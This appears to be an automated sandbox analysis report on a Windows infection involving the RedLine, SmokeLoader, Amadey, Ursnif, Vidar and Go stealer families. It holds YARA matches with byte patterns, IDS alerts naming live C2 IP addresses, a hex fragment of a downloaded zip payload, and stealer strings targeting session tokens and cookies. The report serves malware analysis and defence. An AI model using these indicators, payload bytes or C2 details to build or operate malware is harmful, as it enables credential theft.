32.2.F771.exe.27a0ee8.5.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
11.2.cttgcew.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
13.2.B4A7.exe.716f68.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.2.B4A7.exe.716f68.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1f430:$pat14: , CommandLine: 0x17162:$v2_1: ListOfProcesses 0x16eed:$v4_3: base64str 0x17f81:$v4_4: stringKey 0x14b08:$v4_5: BytesToStringConverted 0x13b70:$v4_6: FromBase64 0x152dc:$v4_8: procName 0x1565f:$v5_1: DownloadAndExecuteUpdate 0x16dfd:$v5_2: ITaskProcessor 0x1564d:$v5_3: CommandLineUpdate 0x1563e:$v5_4: DownloadUpdate 0x15cf1:$v5_5: FileScanning 0x14e77:$v5_7: RecordHeaderField 0x14896:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.3.B4A7.exe.d290000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.d290000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
24.2.E35A.exe.12094a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.q4Z52wRd28.exe.960e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.EB2B.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
32.2.F771.exe.27a0000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.27a0000.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x33ff6:$pat14: , CommandLine: 0x22ebe:$v2_1: ListOfProcesses 0x21374:$v4_3: base64str 0x21333:$v4_4: stringKey 0x2137e:$v4_5: BytesToStringConverted 0x21369:$v4_6: FromBase64 0x22b7b:$v4_8: procName 0x1ff3c:$v5_1: DownloadAndExecuteUpdate 0x1ff64:$v5_2: ITaskProcessor 0x1ff2a:$v5_3: CommandLineUpdate 0x1ff55:$v5_4: DownloadUpdate 0x1fe9e:$v5_5: FileScanning 0x2013c:$v5_7: RecordHeaderField 0x20066:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
13.3.B4A7.exe.716f68.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.716f68.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.267a196.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.267a196.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x33ff6:$pat14: , CommandLine: 0x22ebe:$v2_1: ListOfProcesses 0x21374:$v4_3: base64str 0x21333:$v4_4: stringKey 0x2137e:$v4_5: BytesToStringConverted 0x21369:$v4_6: FromBase64 0x22b7b:$v4_8: procName 0x1ff3c:$v5_1: DownloadAndExecuteUpdate 0x1ff64:$v5_2: ITaskProcessor 0x1ff2a:$v5_3: CommandLineUpdate 0x1ff55:$v5_4: DownloadUpdate 0x1fe9e:$v5_5: FileScanning 0x2013c:$v5_7: RecordHeaderField 0x20066:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
32.2.F771.exe.267b07e.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.267b07e.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x34f0e:$pat14: , CommandLine: 0x23dd6:$v2_1: ListOfProcesses 0x2228c:$v4_3: base64str 0x2224b:$v4_4: stringKey 0x22296:$v4_5: BytesToStringConverted 0x22281:$v4_6: FromBase64 0x23a93:$v4_8: procName 0x20e54:$v5_1: DownloadAndExecuteUpdate 0x20e7c:$v5_2: ITaskProcessor 0x20e42:$v5_3: CommandLineUpdate 0x20e6d:$v5_4: DownloadUpdate 0x20db6:$v5_5: FileScanning 0x21054:$v5_7: RecordHeaderField 0x20f7e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.267b07e.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.267b07e.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3310e:$pat14: , CommandLine: 0x21fd6:$v2_1: ListOfProcesses 0x2048c:$v4_3: base64str 0x2044b:$v4_4: stringKey 0x20496:$v4_5: BytesToStringConverted 0x20481:$v4_6: FromBase64 0x21c93:$v4_8: procName 0x1f054:$v5_1: DownloadAndExecuteUpdate 0x1f07c:$v5_2: ITaskProcessor 0x1f042:$v5_3: CommandLineUpdate 0x1f06d:$v5_4: DownloadUpdate 0x1efb6:$v5_5: FileScanning 0x1f254:$v5_7: RecordHeaderField 0x1f17e:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
32.2.F771.exe.27a0000.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.27a0000.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
24.2.E35A.exe.bb0000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
13.3.B4A7.exe.716f68.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
13.3.B4A7.exe.716f68.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x21030:$pat14: , CommandLine: 0x18d62:$v2_1: ListOfProcesses 0x18aed:$v4_3: base64str 0x19b81:$v4_4: stringKey 0x16708:$v4_5: BytesToStringConverted 0x15770:$v4_6: FromBase64 0x16edc:$v4_8: procName 0x1725f:$v5_1: DownloadAndExecuteUpdate 0x189fd:$v5_2: ITaskProcessor 0x1724d:$v5_3: CommandLineUpdate 0x1723e:$v5_4: DownloadUpdate 0x178f1:$v5_5: FileScanning 0x16a77:$v5_7: RecordHeaderField 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
24.2.E35A.exe.12094a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
32.2.F771.exe.267a196.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.267a196.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x35df6:$pat14: , CommandLine: 0x24cbe:$v2_1: ListOfProcesses 0x23174:$v4_3: base64str 0x23133:$v4_4: stringKey 0x2317e:$v4_5: BytesToStringConverted 0x23169:$v4_6: FromBase64 0x2497b:$v4_8: procName 0x21d3c:$v5_1: DownloadAndExecuteUpdate 0x21d64:$v5_2: ITaskProcessor 0x21d2a:$v5_3: CommandLineUpdate 0x21d55:$v5_4: DownloadUpdate 0x21c9e:$v5_5: FileScanning 0x21f3c:$v5_7: RecordHeaderField 0x21e66:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
11.2.cttgcew.860e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
36.2.EB2B.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
32.2.F771.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
32.2.F771.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 1E 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
47.2.RegSvcs.exe.400000.0.raw.unpack	JoeSecurity_GoStealer	Yara detected Go Stealer	Joe Security
47.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_GoStealer	Yara detected Go Stealer	Joe Security
Click to see the 54 entries

Snort Signatures

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449747802027700 11/19/22-16:58:50.225468
SID:	2027700
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449753802027700 11/19/22-16:58:52.314328
SID:	2027700
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449744802027700 11/19/22-16:58:49.534930
SID:	2027700
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449746802027700 11/19/22-16:58:49.809680
SID:	2027700
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849727802851815 11/19/22-16:58:32.473174
SID:	2851815
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849736802851815 11/19/22-16:58:36.653112
SID:	2851815
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449752802027700 11/19/22-16:58:52.037330
SID:	2027700
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449748802027700 11/19/22-16:58:50.604993
SID:	2027700
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449751802027700 11/19/22-16:58:51.692909
SID:	2027700
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449749802027700 11/19/22-16:58:51.029782
SID:	2027700
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449750802027700 11/19/22-16:58:51.366139
SID:	2027700
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.3 - Destination IP: 77.232.37.228

Timestamp:	192.168.2.377.232.37.22849730802851815 11/19/22-16:58:34.840324
SID:	2851815
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.3 - Destination IP: 193.56.146.174

Timestamp:	192.168.2.3193.56.146.17449745802027700 11/19/22-16:58:49.249164
SID:	2027700
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 19 Nov 2022 15:58:52 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.236.109
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.35.237.194
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.106.206
Source: unknown	TCP traffic detected without corresponding DNS query: 8.241.126.249
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 8.248.147.254
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.108.226
Source: unknown	TCP traffic detected without corresponding DNS query: 8.248.147.254

Source: RegSvcs.exe, 0000002F.00000002.623527954.000000C0000BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CP="This is not a P3P policy! See g.co/p3phelp for more info."https://www.youtube.com/getAccountSwitcherEndpoint2022/11/19 16:59:33 invalid cookies equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.624937486.000000C0000F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.624937486.000000C0000F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: (?<=INNERTUBE_CONTEXT_SERIALIZED_DELEGATION_CONTEXT\":\"((?<=PAGE_CL\":).*?(?=(,\|}))) https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.623396941.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: (?=\")(?=\")(?=\")"challenge": "(.?)""challenge": "(.?)""sessionToken": "(.?)""sessionToken": "(.?)""sessionToken": ""sessionRiskCtx": "GetFileAttributesExWSystemFunction036HTTP/1.1 302 Found application/binaryX-Content-Type-OptionsPermissions-PolicyGetTimeZoneInformationPacific Standard Timeyoutube.com;/;CONSENThttps://www.youtube.com65.21.213.208:3000 equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.631927197.000000C0001A2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: .google.com.bdn.devg.cn.google.ca.google.cl.google.co.in.google.co.jp.google.co.uk.google.com.ar.google.com.au.google.com.br.google.com.co.google.com.mx.google.com.tr.google.com.vn.google.de.google.es.google.fr.google.hu.google.it.google.nl.google.pl.google.pt.googleapis.cn.gstatic.cn.gstatic-cn.comgooglecnapps.cngkecnapps.cn.gkecnapps.cnrecaptcha.net.cnrecaptcha-cn.netwidevine.cn.widevine.cndoubleclick.cn.doubleclick.cngvt1-cn.com.gvt1-cn.comgvt2-cn.com.gvt2-cn.com2mdn-cn.net.2mdn-cn.netadmob-cn.com.admob-cn.com.gstatic.com.gvt1.com.gvt2.com.gcp.gvt2.com.url.google.com.ytimg.comandroid.com.android.com.g.cng.co.g.cogoo.glwww.goo.glgoogle.comggpht.cnyoutu.be.ggpht.cnurchin.com.urchin.comyoutube.comyt.be.youtube.comyoutubekids.com*.yt.beUSUSCaliforniaSan Francisco150317141638Z150317141638Z450309141638Z450309141638ZCalifornia2.2.5San Francisco2.5.2.5.292.5.29.2.5.29.142.2.52.5.2.5.292.5.29.2.5.29.352.2.52.5.2.5.292.5.29.2.5.29.19 equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.631360527.000000C000184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CertCreateCertificateContextCertFreeCertificateContextwww.youtube.com equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.634187235.000000C000222000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Host: www.youtube.com equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.631360527.000000C000184000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: IKernel32.dllPRAGMA busy_timeout = 5000;PRAGMA locking_mode = NORMAL;PRAGMA synchronous = NORMAL;637962485686793996-3320600880637962485686793996-3320600880GA1.2-4.172648318.1660684298GA1.2-4.172648318.1660684298GA1.2-4.1640056110.1660684298GA1.2-4.1640056110.1660684298GA1.2-2.172648318.1660684298GA1.2-2.172648318.1660684298GA1.2-2.1640056110.1660684298GA1.2-2.1640056110.1660684298GA1.1-4.172648318.1660684298GA1.1-4.172648318.16606842986639696_84_88_104280_84_4469406639696_84_88_104280_84_446940REQUEST_METHODwww.youtube.com equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000002F.00000002.633216729.000000C0001FA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Location: https://accounts.google.com/ServiceLogin?service=youtube&passive=1209600&continue=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint&followup=https%3A%2F%2Fwww.youtube.com%2FgetAccountSwitcherEndpoint equals www.youtube.com (Youtube)
Source: explorer.exe, 00000027.00000002.772302955.00000000008F1000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Referer: %SHost: %shttp://yandex.ru/yandsearchhttp://www.google.com/searchhttp://go.mail.ru/searchhttp://nova.rambler.ru/searchhttp://search.aol.com/aol/searchhttp://search.yahoo.com/search; WOW64; Win64; x64; Trident/7.0; rv:11.0) like Gecko; rv:58.0) Gecko/20100101 Firefox/58.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.67) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Mozilla/5.0 (Windows NT %d.%d%s%s/<ahref"' >%s%s%shttp:,FFddos_rules=\|:\|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoConnection: close equals www.rambler.ru (Rambler)
